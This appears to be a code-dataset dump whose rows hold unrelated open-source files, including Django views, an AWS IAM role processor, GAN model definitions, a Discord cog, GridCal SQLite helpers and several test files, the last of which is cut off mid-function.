max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
lmgtfy/views.py | opendata/LMGTDFY | 120 | 11155251 | import csv
from django.contrib import messages
from django.shortcuts import HttpResponseRedirect, resolve_url, HttpResponse
from django.views.generic import FormView, ListView
from lmgtfy.forms import MainForm
from lmgtfy.helpers import search_bing, check_valid_tld
from lmgtfy.models import Domain, DomainSearch, DomainSearchResult
class MainView(FormView):
template_name = 'main.html'
form_class = MainForm
success_url = '.'
def get_context_data(self, **kwargs):
context = super(MainView, self).get_context_data(**kwargs)
domains_and_latest_counts = []
for domain in Domain.objects.order_by("-id")[:50]:
domain_search_latest = domain.domainsearch_set.all().last()
if not domain_search_latest:
continue
count = domain_search_latest.domainsearchresult_set.count()
domains_and_latest_counts.append((domain.name, count))
context['table_data'] = domains_and_latest_counts
return context
def form_valid(self, form):
data = form.cleaned_data
domain = data['domain_base']
domain_is_whitelisted = check_valid_tld(domain)
if not domain_is_whitelisted:
messages.info(
self.request,
"Sorry, but to limit the cost of running this service, we have not enabled searching this domain name (%s)." % domain
)
return HttpResponseRedirect(resolve_url('home'))
search_done = search_bing(domain)
if not search_done:
messages.info(
self.request,
"This domain has already been requested today! Here is what we've gathered."
)
else:
messages.info(
self.request,
"Gathering results now. They will be displayed shortly."
)
return HttpResponseRedirect(
resolve_url('domain_result', domain)
)
main_view = MainView.as_view()
class SearchResultView(ListView):
template_name = 'result.html'
model = DomainSearchResult
success_url = '.'
def get_queryset(self):
qs = super(SearchResultView, self).get_queryset()
try:
domain = self.kwargs['domain']
fmt = self.kwargs.get('fmt')
except:
raise Exception('Invalid URL parameter has been passed.')
qs = qs.filter(
search_instance__domain__name=domain
).order_by('result')
if fmt:
qs = qs.filter(fmt=fmt)
return qs
def get_context_data(self, **kwargs):
context = super(SearchResultView, self).get_context_data(**kwargs)
domain_name = self.kwargs['domain']
context['domain_name'] = domain_name
context['format'] = self.kwargs.get('fmt')
self.kwargs['fmt'] = None # clear the format
# so that we get a list of all of the formats for the domain
qs = set(self.get_queryset().values_list('fmt', flat=True))
context['file_formats'] = list(qs)
domain = Domain.objects.filter(name=domain_name)
search_being_performed = len(DomainSearch.objects.filter(domain=domain, completed_at=None)) > 0
if search_being_performed:
messages.info(
self.request,
"We're gathering more results right now. This page will refresh in 10 seconds."
)
context['refresh_counter'] = 10
return context
search_result_view = SearchResultView.as_view()
def get_csv(request, domain):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="%s.csv"' % domain
writer = csv.writer(response)
qs = DomainSearchResult.objects.filter(
search_instance__domain__name=domain
).order_by('result').distinct()
writer.writerow(["title", "format", "kilobyte_size", "url"])
for result in qs:
writer.writerow([result.title.encode("utf-8"), result.fmt.encode("utf-8"),
result.size, result.result.encode("utf-8")])
return response
|
modules/aws_iam_role/aws_iam_role.py | riddopic/opta | 595 | 11155263 | from typing import TYPE_CHECKING
from modules.base import AWSIamAssembler, ModuleProcessor, get_eks_module_refs
from opta.exceptions import UserErrors
if TYPE_CHECKING:
from opta.layer import Layer
from opta.module import Module
class AwsIamRoleProcessor(ModuleProcessor, AWSIamAssembler):
def __init__(self, module: "Module", layer: "Layer"):
if module.data["type"] != "aws-iam-role":
raise Exception(
f"The module {module.name} was expected to be of type aws iam role"
)
super(AwsIamRoleProcessor, self).__init__(module, layer)
def process(self, module_idx: int) -> None:
self.handle_iam_policy(module_idx)
self.handle_k8s_trusts(module_idx)
if (
self.module.data.get("allowed_k8s_services", []) == []
and self.module.data.get("allowed_iams", []) == []
):
raise UserErrors(
"AWS Iam role needs to trust either a k8s service or some other role or user."
)
super(AwsIamRoleProcessor, self).process(module_idx)
def handle_k8s_trusts(self, module_idx: int) -> None:
allowed_k8s_services = self.module.data.get("allowed_k8s_services", [])
if allowed_k8s_services != []:
eks_module_refs = get_eks_module_refs(self.layer, module_idx)
self.module.data["kubernetes_trusts"] = [
{
"open_id_url": eks_module_refs[0],
"open_id_arn": eks_module_refs[1],
"service_name": allowed_k8s_service["service_name"],
"namespace": allowed_k8s_service["namespace"],
}
for allowed_k8s_service in allowed_k8s_services
]
def handle_iam_policy(self, module_idx: int) -> None:
iam_statements = [
{
"Sid": "PolicySimulatorAPI",
"Action": [
"iam:GetContextKeysForCustomPolicy",
"iam:GetContextKeysForPrincipalPolicy",
"iam:SimulateCustomPolicy",
"iam:SimulatePrincipalPolicy",
],
"Effect": "Allow",
"Resource": "*",
},
{
"Sid": "PolicySimulatorConsole",
"Action": [
"iam:GetGroup",
"iam:GetGroupPolicy",
"iam:GetPolicy",
"iam:GetPolicyVersion",
"iam:GetRole",
"iam:GetRolePolicy",
"iam:GetUser",
"iam:GetUserPolicy",
"iam:ListAttachedGroupPolicies",
"iam:ListAttachedRolePolicies",
"iam:ListAttachedUserPolicies",
"iam:ListGroups",
"iam:ListGroupPolicies",
"iam:ListGroupsForUser",
"iam:ListRolePolicies",
"iam:ListRoles",
"iam:ListUserPolicies",
"iam:ListUsers",
],
"Effect": "Allow",
"Resource": "*",
},
]
# Handle links
for link_data in self.module.data.get("links", []):
if type(link_data) is str:
target_module_name = link_data
link_permissions = []
elif type(link_data) is dict:
target_module_name = list(link_data.keys())[0]
link_permissions = list(link_data.values())[0]
else:
raise UserErrors(
f"Link data {link_data} must be a string or map holding the permissions"
)
module = self.layer.get_module(target_module_name, module_idx)
if module is None:
raise Exception(
f"Did not find the desired module {target_module_name} "
"make sure that the module you're referencing is listed before the k8s "
"app one"
)
module_type = module.data["type"]
# TODO: Add support for SNS, SQS, KINESIS,
if module_type == "aws-s3":
self.handle_s3_link(module, link_permissions)
elif module_type == "aws-sqs":
self.handle_sqs_link(module, link_permissions)
elif module_type == "aws-sns":
self.handle_sns_link(module, link_permissions)
elif module_type == "aws-dynamodb":
self.handle_dynamodb_link(module, link_permissions)
else:
raise Exception(
f"Unsupported module type for k8s service link: {module_type}"
)
iam_statements += self.prepare_iam_statements()
self.module.data["iam_policy"] = {
"Version": "2012-10-17",
"Statement": iam_statements,
}
|
h2o-py/tests/testdir_algos/gam/pyunit_PUBDEV_7367_gridsearch_subspaces_invalid.py | vishalbelsare/h2o-3 | 6,098 | 11155265 | <reponame>vishalbelsare/h2o-3
from __future__ import division
from __future__ import print_function
from past.utils import old_div
import sys
sys.path.insert(1, "../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gam import H2OGeneralizedAdditiveEstimator
from h2o.grid.grid_search import H2OGridSearch
# In this test, we check to make sure that a grid search on a GAM with hyperparameters and subspaces fails.
# The grid search should fail because gam_columns is specified in both the hyper parameters and the constrained hyper parameters.
class test_gam_gridsearch_specific:
h2o_data = []
myX = []
myY = []
search_criteria = {'strategy': 'Cartesian'}
hyper_parameters = {'gam_columns': [["C11", "C12", "C13"]],
'subspaces': [{'scale': [[1, 1, 1], [2, 2, 2]], 'gam_columns': [["C11", "C12", "C13"]]}]}
h2o_model = []
def __init__(self):
self.setup_data()
def setup_data(self):
"""
This function performs all initializations necessary:
load the data sets and set the training set indices and response column index
"""
self.h2o_data = h2o.import_file(
path=pyunit_utils.locate("smalldata/glm_test/gaussian_20cols_10000Rows.csv"))
self.h2o_data["C1"] = self.h2o_data["C1"].asfactor()
self.h2o_data["C2"] = self.h2o_data["C2"].asfactor()
self.myX = ["C1", "C2"]
self.myY = "C21"
def train_models(self):
try:
self.h2o_model = H2OGridSearch(H2OGeneralizedAdditiveEstimator(
family="gaussian", keep_gam_cols=True), self.hyper_parameters, search_criteria=self.search_criteria)
self.h2o_model.train(x=self.myX, y=self.myY, training_frame=self.h2o_data)
except:
print("Error was raised because gam_columns was specified in hyper parameters and constrained hyper parameters")
else:
raise Exception("No errors raised despite gam_columns being in hyper parameters and constrained hyper parameters")
def test_gridsearch_specific():
test_gam_grid = test_gam_gridsearch_specific()
test_gam_grid.train_models()
if __name__ == "__main__":
pyunit_utils.standalone_test(test_gridsearch_specific)
else:
test_gridsearch_specific()
|
standalone_tests/offline_sync_train.py | borisgrafx/client | 3,968 | 11155342 | import wandb
wandb.init(mode="offline", config=dict(init1=11, init2=22))
wandb.config.extra3=33
wandb.log(dict(this="that"))
wandb.log(dict(yes=2))
|
Sobolev/make_gif.py | inamori/DeepLearningImplementations | 2,010 | 11155346 | <reponame>inamori/DeepLearningImplementations<filename>Sobolev/make_gif.py
import glob
import shlex
import subprocess
from natsort import natsorted
list_files = glob.glob("figures/*")
list_files_20pts = natsorted([f for f in list_files if "20_npts" in f])
list_files_100pts = natsorted([f for f in list_files if "100_npts" in f])
str_20pts = " ".join(list_files_20pts)
str_100pts = " ".join(list_files_100pts)
cmd = "convert -delay 80 -resize 600x600 -loop 0 %s figures/tang_20pts.gif" % str_20pts
subprocess.call(shlex.split(cmd))
cmd = "convert -delay 80 -resize 600x600 -loop 0 %s figures/tang_100pts.gif" % str_100pts
subprocess.call(shlex.split(cmd))
|
python/cogs/extra/chase.py | dev-null-undefined/felix | 135 | 11155374 | """This is a cog for a discord.py bot.
it prints out either a random or specified chase pic,
the guide to those chase pics and some additional resources.
Commands:
chase
├ num print a specific chase pic
└ random prints a random chase pic
"""
import re
from random import choice
from discord.ext import commands, tasks
#pylint: disable=E1101
class Chase(commands.Cog, name='Chase'):
def __init__(self, client):
self.client = client
self.load_chase_pics.start()
self.all_pictures = {}
self.unseen_pictures = []
@tasks.loop(hours=24)
async def load_chase_pics(self):
url = "https://mydogchase.com"
async with self.client.session.get(url) as res:
text = await res.text()
r = re.findall(r'/public/chase/.*\.jpg', text)
self.all_pictures = {i: f'{url}{pic}' for i, pic in enumerate(sorted(r))}
def cog_unload(self):
self.load_chase_pics.cancel()
async def post_chase_pic(self, ctx, num=0, random=False):
#await ctx.trigger_typing()
if len(self.all_pictures) == 0:
raise commands.BadArgument(f"No Chase pics available")
if random:
if not self.unseen_pictures:
self.unseen_pictures = list(range(len(self.all_pictures)))
num = choice(self.unseen_pictures)
self.unseen_pictures.remove(num)
else:
if not 0 <= num < len(self.all_pictures):
raise commands.BadArgument(f"Choose number from `0-{len(self.all_pictures)-1}`")
await ctx.send(f'Picture #{num}: {self.all_pictures[num]}')
@commands.group(
invoke_without_command=True,
name='chase',
)
async def chase_pic(self, ctx, num: int):
"""'Show a specific chase pic'"""
await self.post_chase_pic(ctx, num=num)
@chase_pic.command(
name='random',
aliases=['r'],
)
async def random_chase_pic(self, ctx):
"""Randomly choose a chase pic"""
await self.post_chase_pic(ctx, random=True)
def setup(client):
"""This is called when the cog is loaded via load_extension"""
client.add_cog(Chase(client))
|
src/users/migrations/0005_UserUUID.py | denkasyanov/education-backend | 151 | 11155410 | # Generated by Django 3.1.8 on 2021-05-01 23:33
import uuid
from django.db import migrations, models
def set_random_uuid_for_all_users(apps, schema_editor):
for user in apps.get_model('users.User').objects.filter(uuid__isnull=True).iterator():
user.uuid = uuid.uuid4()
user.save(update_fields=['uuid'])
class Migration(migrations.Migration):
dependencies = [
('users', '0004_NamesInEnglish'),
]
operations = [
migrations.AddField(
model_name='user',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.RunPython(set_random_uuid_for_all_users),
migrations.AlterField(
model_name='user',
name='uuid',
field=models.UUIDField(db_index=True, default=uuid.uuid4, unique=True),
),
]
|
utils/report.py | WuDiDaBinGe/TAKG | 130 | 11155425 | import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import numpy as np
def export_train_and_valid_reward(train_reward, valid_reward, plot_every, path):
# Export the results to a csv file
labels = ['Training reward:,', 'Validation reward:,']
float_lists = [train_reward, valid_reward]
with open(path + '.csv', 'w') as result_csv:
for i in range(len(labels)):
result_csv.write(labels[i] + concat_float_list(float_lists[i], ',') + '\n')
# Export the plots to pdf file
plot_train_valid_curve(train_reward, valid_reward, plot_every, path, 'Reward')
def export_train_and_valid_loss(train_loss, valid_loss, train_ppl, valid_ppl, plot_every, path):
"""
:param train_loss: a list of float
:param valid_loss: a list of float
:param train_ppl: a list of float
:param valid_ppl: a list of float
:param plot_every: int
:param path: str
:return:
"""
# Export the results to a csv file
labels = ['Training loss:,', 'Validation loss:,', 'Training perplexity:,', 'Validation Perplexity:,']
float_lists = [train_loss, valid_loss, train_ppl, valid_ppl]
with open(path + '.csv', 'w') as result_csv:
for i in range(len(labels)):
result_csv.write(labels[i] + concat_float_list(float_lists[i], ',') + '\n')
# Export the plots to pdf file
plot_train_valid_curve(train_loss, valid_loss, plot_every, path, 'Loss')
plot_train_valid_curve(train_ppl, valid_ppl, plot_every, path, 'Perplexity')
def concat_float_list(list, delimiter=','):
return delimiter.join([str(l) for l in list])
def plot_train_valid_curve(train_loss, valid_loss, plot_every, path, loss_label):
#plt.ioff()
title = "Training and validation %s for every %d iterations" % (loss_label.lower(), plot_every)
plt.figure()
plt.title(title)
plt.xlabel("Checkpoints")
plt.ylabel(loss_label)
num_checkpoints = len(train_loss)
X = list(range(num_checkpoints))
plt.plot(X, train_loss, label="training")
plt.plot(X, valid_loss, label="validation")
plt.legend()
plt.savefig("%s_%s.pdf" % (path, loss_label.lower()))
if __name__ == '__main__':
train_loss = [20.1,15.3,12.3,11.0,10.0]
valid_loss = [30.2,29.2,25.2,21.3,20.2]
train_ppl = [10.1,5.3,2.3,1.0,1.0]
valid_ppl = [20.2,19.2,15.2,11.3,10.2]
plot_every = 4000
path = '../exp/debug/valid_train_curve'
export_train_and_valid_loss(train_loss, valid_loss, train_ppl, valid_ppl, plot_every, path)
|
models/SelectionGAN/person_transfer/models/model_variants.py | xianjian-xie/pose-generation | 445 | 11155431 | import torch.nn as nn
import functools
import torch
import functools
import torch.nn.functional as F
class PATBlock(nn.Module):
def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias, cated_stream2=False):
super(PATBlock, self).__init__()
self.conv_block_stream1 = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, cal_att=False)
self.conv_block_stream2 = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, cal_att=True, cated_stream2=cated_stream2)
def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias, cated_stream2=False, cal_att=False):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if cated_stream2:
conv_block += [nn.Conv2d(dim*2, dim*2, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim*2),
nn.ReLU(True)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim),
nn.ReLU(True)]
if use_dropout:
conv_block += [nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if cal_att:
if cated_stream2:
conv_block += [nn.Conv2d(dim*2, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim)]
return nn.Sequential(*conv_block)
def forward(self, x1, x2):
# change here
x1_out = self.conv_block_stream1(x1)
x2_out = self.conv_block_stream2(x2)
# att = F.sigmoid(x2_out)
att = torch.sigmoid(x2_out)
x1_out = x1_out * att
out = x1 + x1_out # residual connection
# stream2 receive feedback from stream1
x2_out = torch.cat((x2_out, out), 1)
return out, x2_out, x1_out
class PATNModel(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
assert(n_blocks >= 0 and type(input_nc) == list)
super(PATNModel, self).__init__()
self.input_nc_s1 = input_nc[0]
self.input_nc_s2 = input_nc[1]
self.output_nc = output_nc
self.ngf = ngf
self.gpu_ids = gpu_ids
if type(norm_layer) == functools.partial:
use_bias = norm_layer.func == nn.InstanceNorm2d
else:
use_bias = norm_layer == nn.InstanceNorm2d
# down_sample
model_stream1_down = [nn.ReflectionPad2d(3),
nn.Conv2d(self.input_nc_s1, ngf, kernel_size=7, padding=0,
bias=use_bias),
norm_layer(ngf),
nn.ReLU(True)]
model_stream2_down = [nn.ReflectionPad2d(3),
nn.Conv2d(self.input_nc_s2, ngf, kernel_size=7, padding=0,
bias=use_bias),
norm_layer(ngf),
nn.ReLU(True)]
# n_downsampling = 2
for i in range(n_downsampling):
mult = 2**i
model_stream1_down += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3,
stride=2, padding=1, bias=use_bias),
norm_layer(ngf * mult * 2),
nn.ReLU(True)]
model_stream2_down += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3,
stride=2, padding=1, bias=use_bias),
norm_layer(ngf * mult * 2),
nn.ReLU(True)]
# att_block in place of res_block
mult = 2**n_downsampling
cated_stream2 = [True for i in range(n_blocks)]
cated_stream2[0] = False
attBlock = nn.ModuleList()
for i in range(n_blocks):
attBlock.append(PATBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer, use_dropout=use_dropout, use_bias=use_bias, cated_stream2=cated_stream2[i]))
# up_sample
model_stream1_up = []
for i in range(n_downsampling):
mult = 2**(n_downsampling - i)
model_stream1_up += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2),
kernel_size=3, stride=2,
padding=1, output_padding=1,
bias=use_bias),
norm_layer(int(ngf * mult / 2)),
nn.ReLU(True)]
model_stream1_up2 = []
model_stream1_up2 += [nn.ReflectionPad2d(3)]
model_stream1_up2 += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]
model_stream1_up2 += [nn.Tanh()]
# self.model = nn.Sequential(*model)
self.stream1_down = nn.Sequential(*model_stream1_down)
self.stream2_down = nn.Sequential(*model_stream2_down)
# self.att = nn.Sequential(*attBlock)
self.att = attBlock
self.stream1_up = nn.Sequential(*model_stream1_up)
self.stream1_up2 = nn.Sequential(*model_stream1_up2)
def forward(self, input): # x from stream 1 and stream 2
# here x should be a tuple
x1, x2 = input
# down_sample
x1 = self.stream1_down(x1)
x2 = self.stream2_down(x2)
# att_block
for model in self.att:
x1, x2, _ = model(x1, x2)
# up_sample
feature = self.stream1_up(x1)
x1 = self.stream1_up2(feature)
# print('feature', feature.size()) [32, 64, 128, 64]
# print('x1', x1.size()) [32, 3, 128, 64]
return x1, feature
class SelectionGANModel(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
assert(n_blocks >= 0 and type(input_nc) == list)
super(SelectionGANModel, self).__init__()
self.input_nc_s1 = input_nc[0]
self.input_nc_s2 = input_nc[1]
self.output_nc = output_nc
self.ngf = ngf
self.gpu_ids = gpu_ids
self.pool1 = nn.AvgPool2d(kernel_size=(1, 1))
self.pool2 = nn.AvgPool2d(kernel_size=(4, 4))
self.pool3 = nn.AvgPool2d(kernel_size=(9, 9))
self.conv106 = nn.Conv2d(106*4, 106, kernel_size=3, stride=1, padding=1, bias=nn.InstanceNorm2d)
self.model_attention = nn.Conv2d(106, 10, kernel_size=1, stride=1, padding=0)
self.model_image = nn.Conv2d(106, 30, kernel_size=3, stride=1, padding=1)
self.tanh = torch.nn.Tanh()
self.convolution_for_attention = torch.nn.Conv2d(10, 1, 1, stride=1, padding=0)
def forward(self, input): # x from stream 1 and stream 2
# input: [32, 106, 128, 64]
pool_feature1 = self.pool1(input)
pool_feature2 = self.pool2(input)
pool_feature3 = self.pool3(input)
b, c, h, w = input.size()
pool_feature1_up = F.upsample(input=pool_feature1, size=(h, w), mode='bilinear', align_corners=True)
pool_feature2_up = F.upsample(input=pool_feature2, size=(h, w), mode='bilinear', align_corners=True)
pool_feature3_up = F.upsample(input=pool_feature3, size=(h, w), mode='bilinear', align_corners=True)
f1 = input * pool_feature1_up
f2 = input * pool_feature2_up
f3 = input * pool_feature3_up
feature_image_combine = torch.cat((f1, f2, f3, input), 1) # feature_image_combine: 106*4
feature_image_combine = self.conv106(feature_image_combine) # feature_image_combine: 106
attention = self.model_attention(feature_image_combine) # attention: 10
image = self.model_image(feature_image_combine) # image: 30
softmax_ = torch.nn.Softmax(dim=1)
attention = softmax_(attention)
attention1_ = attention[:, 0:1, :, :]
attention2_ = attention[:, 1:2, :, :]
attention3_ = attention[:, 2:3, :, :]
attention4_ = attention[:, 3:4, :, :]
attention5_ = attention[:, 4:5, :, :]
attention6_ = attention[:, 5:6, :, :]
attention7_ = attention[:, 6:7, :, :]
attention8_ = attention[:, 7:8, :, :]
attention9_ = attention[:, 8:9, :, :]
attention10_ = attention[:, 9:10, :, :]
attention1 = attention1_.repeat(1, 3, 1, 1)
attention2 = attention2_.repeat(1, 3, 1, 1)
attention3 = attention3_.repeat(1, 3, 1, 1)
attention4 = attention4_.repeat(1, 3, 1, 1)
attention5 = attention5_.repeat(1, 3, 1, 1)
attention6 = attention6_.repeat(1, 3, 1, 1)
attention7 = attention7_.repeat(1, 3, 1, 1)
attention8 = attention8_.repeat(1, 3, 1, 1)
attention9 = attention9_.repeat(1, 3, 1, 1)
attention10 = attention10_.repeat(1, 3, 1, 1)
image = self.tanh(image)
image1 = image[:, 0:3, :, :]
image2 = image[:, 3:6, :, :]
image3 = image[:, 6:9, :, :]
image4 = image[:, 9:12, :, :]
image5 = image[:, 12:15, :, :]
image6 = image[:, 15:18, :, :]
image7 = image[:, 18:21, :, :]
image8 = image[:, 21:24, :, :]
image9 = image[:, 24:27, :, :]
image10 = image[:, 27:30, :, :]
output1 = image1 * attention1
output2 = image2 * attention2
output3 = image3 * attention3
output4 = image4 * attention4
output5 = image5 * attention5
output6 = image6 * attention6
output7 = image7 * attention7
output8 = image8 * attention8
output9 = image9 * attention9
output10 = image10 * attention10
output10 = image10 * attention10
final = output1 + output2 + output3 + output4 + output5 + output6 + output7 + output8 + output9 + output10
# print('final', final.size()) [32, 3, 128, 64]
sigmoid_ = torch.nn.Sigmoid()
uncertainty = self.convolution_for_attention(attention)
uncertainty = sigmoid_(uncertainty)
uncertainty_map = uncertainty.repeat(1, 3, 1, 1)
return final, uncertainty_map
class PATNetwork(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
super(PATNetwork, self).__init__()
assert type(input_nc) == list and len(input_nc) == 2, 'The AttModule take input_nc in format of list only!!'
self.gpu_ids = gpu_ids
self.model = PATNModel(input_nc, output_nc, ngf, norm_layer, use_dropout, n_blocks, gpu_ids, padding_type, n_downsampling=n_downsampling)
def forward(self, input):
if self.gpu_ids and isinstance(input[0].data, torch.cuda.FloatTensor):
return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
else:
return self.model(input)
class SelectionGANNetwork(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
super(SelectionGANNetwork, self).__init__()
# assert type(input_nc) == list and len(input_nc) == 2, 'The AttModule take input_nc in format of list only!!'
self.gpu_ids = gpu_ids
self.model = SelectionGANModel(input_nc, output_nc, ngf, norm_layer, use_dropout, n_blocks, gpu_ids, padding_type, n_downsampling=n_downsampling)
def forward(self, input):
if self.gpu_ids and isinstance(input[0].data, torch.cuda.FloatTensor):
return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
else:
return self.model(input)
|
src/GridCal/Engine/IO/sqlite_interface.py | mzy2240/GridCal | 284 | 11155432 | # This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import pandas as pd
import sqlite3
import numpy as np
from GridCal.Engine.basic_structures import Logger
from GridCal.Engine.Core.multi_circuit import MultiCircuit
from GridCal.Engine.IO.excel_interface import check_names
from GridCal.Engine.IO.generic_io_functions import parse_config_df
def save_data_frames_to_sqlite(dfs, file_path, text_func=None, progress_func=None):
"""
Save the circuit information in excel format
:param dfs: list of DataFrames
:param file_path: path to the excel file
:return: logger with information
"""
logger = Logger()
conn = sqlite3.connect(file_path)
n = len(dfs.keys())
for i, key in enumerate(dfs.keys()):
if progress_func is not None:
progress_func((i + 1) / n * 100)
if text_func is not None:
text_func('Saving ' + key)
dfs[key].to_sql(key, conn, if_exists='replace', index=False)
return logger
def open_data_frames_from_sqlite(file_path, text_func=None, progress_func=None):
# make connection
conn = sqlite3.connect(file_path)
dfs = dict()
# get the table names
tables = conn.execute("SELECT name FROM sqlite_master WHERE type='table';")
names = [t[0] for t in tables]
check_names(names)
n = len(names)
for i, key in enumerate(names):
if progress_func is not None:
progress_func((i + 1) / n * 100)
if text_func is not None:
text_func('select * from ' + key)
dfs[key] = pd.read_sql('select * from ' + key, conn)
# parse the configuration
dfs = parse_config_df(dfs['config'], dfs)
return dfs
if __name__ == '__main__':
import time
from GridCal.Engine.IO.file_handler import *
from GridCal.Engine.IO.pack_unpack import create_data_frames, data_frames_to_circuit
# fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/1354 Pegase.xlsx'
fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/IEEE39.gridcal'
a = time.time()
circuit_ = FileOpen(fname).open()
print('native based open:', time.time() - a)
print('Saving .sqlite ...')
dfs = dfs = create_data_frames(circuit=circuit_)
save_data_frames_to_sqlite(dfs, file_path=circuit_.name + '.sqlite')
a = time.time()
data = open_data_frames_from_sqlite(circuit_.name + '.sqlite')
circuit2 = data_frames_to_circuit(data)
print('sql based open:', time.time() - a)
|
optimus/helpers/functions_spark.py | liRONCO11/optimus | 1,045 | 11155436 | from functools import reduce
from optimus.helpers.core import val_to_list
from optimus.helpers.functions import random_int
from optimus.helpers.raiseit import RaiseIt
from optimus.infer import is_
def traverse(obj, path=None, callback=None):
"""
Traverse a deep nested python structure
:param obj: object to traverse
:param path:
:param callback: Function used to transform a value
:return:
"""
from pyspark.ml.linalg import DenseVector
if path is None:
path = []
if is_(obj, dict):
value = {k: traverse(v, path + [k], callback)
for k, v in obj.items()}
elif is_(obj, list):
value = [traverse(elem, path + [[]], callback)
for elem in obj]
elif is_(obj, tuple):
value = tuple(traverse(elem, path + [[]], callback)
for elem in obj)
elif is_(obj, DenseVector):
value = DenseVector([traverse(elem, path + [[]], callback) for elem in obj])
else:
value = obj
if callback is None: # if a callback is provided, call it to get the new value
return value
else:
return callback(path, value)
def append(dfs, like="columns"):
"""
Concat multiple dataFrames columns or rows wise
:param dfs: List of DataFrames
:param like: concat as columns or rows
:return:
"""
# FIX: Because monotonically_increasing_id can create different
# sequence for different dataframes the result could be wrong.
if like == "columns":
temp_dfs = []
col_temp_name = "id_" + random_int()
dfs = val_to_list(dfs)
for df in dfs:
from pyspark.sql import functions as F
temp_dfs.append(df.withColumn(col_temp_name, F.monotonically_increasing_id()))
def _append(df1, df2):
return df1.join(df2, col_temp_name, "outer")
df_result = reduce(_append, temp_dfs).drop(col_temp_name)
elif like == "rows":
from pyspark.sql import DataFrame
df_result = reduce(DataFrame.union, dfs)
else:
RaiseIt.value_error(like, ["columns", "rows"])
return df_result |
tests/constraints/test_int_constraints.py | lyz-code/pydantic-factories | 163 | 11155437 | from typing import Optional
import pytest
from hypothesis import given
from hypothesis.strategies import integers
from pydantic import ConstrainedInt
from pydantic_factories.constraints.constrained_integer_handler import (
handle_constrained_int,
)
from pydantic_factories.utils import passes_pydantic_multiple_validator
def create_constrained_field(
gt: Optional[int] = None,
ge: Optional[int] = None,
lt: Optional[int] = None,
le: Optional[int] = None,
multiple_of: Optional[int] = None,
) -> ConstrainedInt:
field = ConstrainedInt()
field.ge = ge
field.gt = gt
field.lt = lt
field.le = le
field.multiple_of = multiple_of
return field
def test_handle_constrained_int_without_constraints():
result = handle_constrained_int(create_constrained_field())
assert isinstance(result, int)
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_ge(minimum):
result = handle_constrained_int(create_constrained_field(ge=minimum))
assert result >= minimum
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_gt(minimum):
result = handle_constrained_int(create_constrained_field(gt=minimum))
assert result > minimum
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_le(maximum):
result = handle_constrained_int(create_constrained_field(le=maximum))
assert result <= maximum
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_lt(maximum):
result = handle_constrained_int(create_constrained_field(lt=maximum))
assert result < maximum
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_multiple_of(multiple_of):
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of))
assert passes_pydantic_multiple_validator(result, multiple_of)
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_lt(val1, val2):
multiple_of, max_value = sorted([val1, val2])
